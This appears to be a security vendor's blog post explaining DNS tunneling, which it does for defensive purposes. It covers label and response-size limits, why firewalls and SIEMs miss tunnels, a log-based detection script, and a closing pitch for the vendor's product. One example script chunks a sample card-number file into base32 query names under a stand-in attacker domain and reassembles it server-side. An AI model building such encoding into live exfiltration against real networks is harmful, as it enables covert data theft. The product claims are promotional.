Threat Intelligence

DNS Tunneling Explained: How Attackers Steal Data Through Your Firewall

Max, Technical Director·16 March 2026

Why DNS Is the Perfect Exfiltration Channel

Every networked device makes DNS queries, and virtually every firewall allows DNS traffic (UDP and TCP port 53, and increasingly DNS over HTTPS on port 443). If you block DNS, the internet stops working. Attackers have known this for over a decade. DNS tunneling encodes arbitrary data inside DNS queries and responses. Instead of resolving "google.com", a compromised device queries "dGhpcyBpcyBzdG9sZW4gZGF0YQ.attacker-domain.com", where the subdomain is base64-encoded stolen data (that string decodes to "this is stolen data"; real tunnels use base32, hex or a base64 variant without '+', '/' and '=', since those are not valid hostname characters). The attacker's authoritative DNS server receives the query, decodes the data, and responds with the next instruction. Palo Alto Networks' Unit 42 found that DNS tunneling is used in approximately 46% of malware that employs data exfiltration, making it the second most common exfiltration technique after direct HTTPS connections.

The Technical Mechanics

A DNS tunneling attack requires three components: a compromised endpoint, tunneling software (or malware with tunneling capability), and an attacker-controlled domain whose authoritative nameserver the attacker runs. The endpoint encodes data, such as documents, credentials or database exports, into strings that are valid DNS labels, typically using base32, hex or a hostname-safe base64 variant. The protocol sets the budget: a label is at most 63 characters and a full query name at most 253, so after the attacker's domain suffix and the encoding overhead each query carries roughly 130 to 180 bytes of raw data. The response channel is wider: a TXT record can hold up to 65,535 bytes of data (as a sequence of 255-byte strings), although a single UDP response is limited to 512 bytes, or typically 1,232 to 4,096 bytes with EDNS0, so the largest responses need TCP fallback. At a sustained 50 queries per second the upstream channel moves on the order of half a megabyte per minute, and responses can push commands or second-stage payloads faster still. Tools like iodine, dnscat2 and Cobalt Strike's DNS beacon make this trivial to deploy. Because the stolen data rides inside well-formed queries sent to the organisation's own recursive resolver, which forwards them to the attacker's nameserver, the whole exchange looks like ordinary DNS resolution to traditional security tools.

  • A label is at most 63 characters and a full query name at most 253, leaving roughly 130-180 bytes of raw data per query
  • TXT responses can carry up to 65,535 bytes over TCP; UDP responses are capped at 512 bytes, or about 1,232-4,096 bytes with EDNS0
  • At 50 queries/second, roughly half a megabyte per minute upstream
  • Tools: iodine, dnscat2, Cobalt Strike DNS beacon
  • Queries reach the attacker through the organisation's own recursive resolver and appear as normal DNS resolution to most security tools
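A worked illustration of the encoding and chunking described above, written for this page (it is not code from iodine, dnscat2 or any other tool the article names): it splits a payload into base32-encoded query names that respect the 63-character label and 253-character name limits, reassembles them on the receiving side, and computes the resulting per-query payload and upstream rate. The domain attacker-domain.example, the 4-hex-digit sequence label and the sample payload are assumptions of the example.

```python
import base64
import math

# Assumptions for this example (not from the article): a placeholder tunnel domain
# and a 4-hex-digit sequence label so out-of-order UDP queries can be reassembled.
TUNNEL_DOMAIN = "attacker-domain.example"
SEQ_LEN = 4
MAX_LABEL = 63   # RFC 1035: a label is at most 63 octets
MAX_NAME = 253   # RFC 1035: a name in text form is at most 253 characters


def b32(data: bytes) -> str:
    """Hostname-safe encoding: base32 uses only a-z and 2-7. Standard base64
    would emit '+', '/' and '=', which are not valid label characters."""
    return base64.b32encode(data).decode("ascii").rstrip("=").lower()


def unb32(s: str) -> bytes:
    # casefold=True tolerates resolvers that randomise letter case (0x20 encoding).
    return base64.b32decode(s + "=" * (-len(s) % 8), casefold=True)


def max_encoded_chars(budget: int) -> int:
    """Largest c such that c characters split into 63-char labels, plus the
    dots between those labels, fit in `budget` characters."""
    for c in range(budget, 0, -1):
        if c + math.ceil(c / MAX_LABEL) - 1 <= budget:
            return c
    return 0


def bytes_per_query(domain: str = TUNNEL_DOMAIN) -> int:
    """Raw bytes one query name can carry once the domain suffix, the sequence
    label and base32 expansion (8 characters per 5 bytes) are paid for."""
    budget = MAX_NAME - len(domain) - 1 - (SEQ_LEN + 1)
    return (max_encoded_chars(budget) // 8) * 5


def encode_queries(data: bytes, domain: str = TUNNEL_DOMAIN) -> list[str]:
    """Client side: split `data` into query names <seq>.<b32 labels>.<domain>."""
    step = bytes_per_query(domain)
    names = []
    for seq, off in enumerate(range(0, len(data), step)):
        enc = b32(data[off:off + step])
        labels = [enc[i:i + MAX_LABEL] for i in range(0, len(enc), MAX_LABEL)]
        name = ".".join([f"{seq:0{SEQ_LEN}x}", *labels, domain])
        assert len(name) <= MAX_NAME
        assert all(len(lab) <= MAX_LABEL for lab in name.split("."))
        names.append(name)
    return names


def decode_queries(names: list[str], domain: str = TUNNEL_DOMAIN) -> bytes:
    """Server side (the attacker's authoritative nameserver): strip the suffix,
    order by sequence label, decode and concatenate."""
    suffix = "." + domain
    chunks = {}
    for name in names:
        if not name.lower().endswith(suffix):
            continue  # not a tunnel query; a real server would answer it normally
        labels = name.lower()[:-len(suffix)].split(".")
        chunks[int(labels[0], 16)] = unb32("".join(labels[1:]))
    return b"".join(chunks[k] for k in sorted(chunks))


def upstream_bytes_per_minute(qps: float, domain: str = TUNNEL_DOMAIN) -> float:
    return bytes_per_query(domain) * qps * 60


if __name__ == "__main__":
    # Constructed sample payload standing in for a stolen file.
    payload = b"id,name,card\n" + b"1001,A. Example,4111111111111111\n" * 40
    queries = encode_queries(payload)
    print(f"{len(payload)} bytes -> {len(queries)} queries, e.g. {queries[0]}")
    assert decode_queries(queries) == payload
    print(f"{bytes_per_query()} B/query; at 50 qps about "
          f"{upstream_bytes_per_minute(50) / 1024:.0f} KiB/min upstream")
```

With the 23-character example domain the budget works out to 135 raw bytes per query, so 50 queries per second is about 400 KiB per minute upstream; a shorter domain or a denser encoding such as hex-free base64url raises that, and the numbers are what a detection rule on "queries per minute to one domain" should be calibrated against.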

Why Your Firewall and SIEM Miss It

Traditional firewalls inspect DNS at the protocol level: they verify that a packet is a well-formed DNS query, but they do not analyse the query name for encoded data. Next-generation firewalls with DNS inspection capabilities exist, but they typically rely on reputation-based blocking of known malicious domains, which fails against freshly registered attacker-controlled domains. SIEM systems can in principle detect DNS tunneling through anomaly detection (unusual query volumes, a high proportion of never-before-seen subdomains under one domain, high entropy or unusual length in subdomain strings, abnormally large TXT responses), but in practice the signal-to-noise ratio makes this unreliable: hashed CDN hostnames, anti-malware reputation lookups and telemetry services legitimately generate long, high-entropy, high-volume query names, so any single indicator fires constantly. A 2023 SANS Institute study found that organisations using SIEM-based DNS monitoring had a 23% false positive rate, leading most SOC teams to reduce alert sensitivity or ignore DNS anomaly alerts entirely.
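To make those anomaly signals concrete, here is an added example (not from the article, BlackFog or any SIEM product) that runs the indicators named above, plus a subdomain-uniqueness ratio, over constructed resolver log lines. The log format, the thresholds and the two-label approximation of the registered domain are assumptions of the example; production code would use the Public Suffix List and per-environment baselines. Requiring several indicators to agree is what keeps single-signal false positives such as hashed CDN hostnames from firing.

```python
import base64
import hashlib
import math
from collections import defaultdict

# Constructed resolver log lines (not real telemetry) in an assumed format:
# "<time> <client> <qtype> <qname> <response-bytes>".
SAMPLE_LOG = [
    "2026-03-16T10:00:01Z 10.0.0.5 A www.google.com 60",
    "2026-03-16T10:00:02Z 10.0.0.5 A mail.google.com 60",
    "2026-03-16T10:00:03Z 10.0.0.5 A d1a2b3c4e5f6g7h8.cloudfront.net 80",
    "2026-03-16T10:00:04Z 10.0.0.5 A d1a2b3c4e5f6g7h8.cloudfront.net 80",
    "2026-03-16T10:00:05Z 10.0.0.5 AAAA cdn.example.com 72",
]


def constructed_tunnel_lines(n: int, domain: str = "attacker-domain.example") -> list[str]:
    """Synthesise n tunnel-style queries: a sequence label plus base32 labels of
    pseudo-random bytes, each answered with a large TXT record (constructed data)."""
    lines = []
    for i in range(n):
        blob = hashlib.sha512(f"chunk{i}".encode()).digest()          # 64 bytes of noise
        enc = base64.b32encode(blob).decode("ascii").rstrip("=").lower()
        labels = [enc[j:j + 63] for j in range(0, len(enc), 63)]
        qname = ".".join([f"{i:04x}", *labels, domain])
        lines.append(f"2026-03-16T10:01:{i % 60:02d}Z 10.0.0.5 TXT {qname} 900")
    return lines


def shannon_entropy(s: str) -> float:
    """Bits per character of the string's own symbol distribution."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname: str) -> tuple[str, str]:
    """Return (subdomain, registered domain). Simplification: the registered
    domain is the last two labels; real code should consult the Public Suffix List."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def profile(lines):
    """Aggregate, per registered domain, the indicators the text names:
    volume, subdomain uniqueness, subdomain entropy and length, TXT response size."""
    stats = defaultdict(lambda: {"queries": 0, "subdomains": set(),
                                 "entropy_sum": 0.0, "len_sum": 0, "txt_max": 0})
    for line in lines:
        _ts, _client, qtype, qname, size = line.split()
        sub, reg = split_name(qname)
        s = stats[reg]
        s["queries"] += 1
        s["subdomains"].add(sub)
        s["entropy_sum"] += shannon_entropy(sub.replace(".", ""))
        s["len_sum"] += len(sub)
        if qtype == "TXT":
            s["txt_max"] = max(s["txt_max"], int(size))
    return stats


def detect(lines, min_unique=20, min_entropy=3.5, min_len=40, txt_limit=512, min_hits=3):
    """Flag a domain only when several independent indicators agree; any one of
    them alone (entropy, say) also fires on hashed CDN names or reputation lookups."""
    flagged = {}
    for reg, s in profile(lines).items():
        n = s["queries"]
        unique = len(s["subdomains"])
        reasons = []
        if unique >= min_unique and unique / n >= 0.9:
            reasons.append(f"{unique} distinct subdomains in {n} queries (no cache reuse)")
        if s["entropy_sum"] / n >= min_entropy:
            reasons.append(f"mean subdomain entropy {s['entropy_sum'] / n:.2f} bits/char")
        if s["len_sum"] / n >= min_len:
            reasons.append(f"mean subdomain length {s['len_sum'] / n:.0f} chars")
        if s["txt_max"] > txt_limit:
            reasons.append(f"TXT response of {s['txt_max']} bytes")
        if len(reasons) >= min_hits:
            flagged[reg] = reasons
    return flagged


if __name__ == "__main__":
    for domain, why in detect(SAMPLE_LOG + constructed_tunnel_lines(50)).items():
        print(f"{domain}: " + "; ".join(why))
```

On the sample input the cloudfront.net name trips the entropy rule but nothing else, so it stays quiet, while the tunnel domain hits all four indicators. The thresholds are starting points: the uniqueness ratio and the per-domain query rate should be baselined against the organisation's own resolver logs before the rule goes live, which is the tuning step the SANS figure above suggests most teams skip.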

How ADX Catches What Others Miss

Anti data exfiltration technology takes a fundamentally different approach to DNS tunneling. Rather than trying to distinguish malicious DNS queries from legitimate ones after the fact, ADX monitors all outbound data flows — including DNS — in real time at the endpoint. BlackFog's engine analyses the destination, content patterns, volume, and behaviour of every outbound connection. When a device begins making DNS queries with high-entropy subdomain strings to a recently registered domain at an elevated frequency, ADX blocks the traffic before the first byte of stolen data reaches the attacker's server. This works regardless of the encoding scheme, tunneling tool, or domain reputation because ADX is analysing the behaviour of the data flow, not just the protocol compliance of the packet.

Tags: dns tunneling, exfiltration, firewall evasion, technical, blackfog
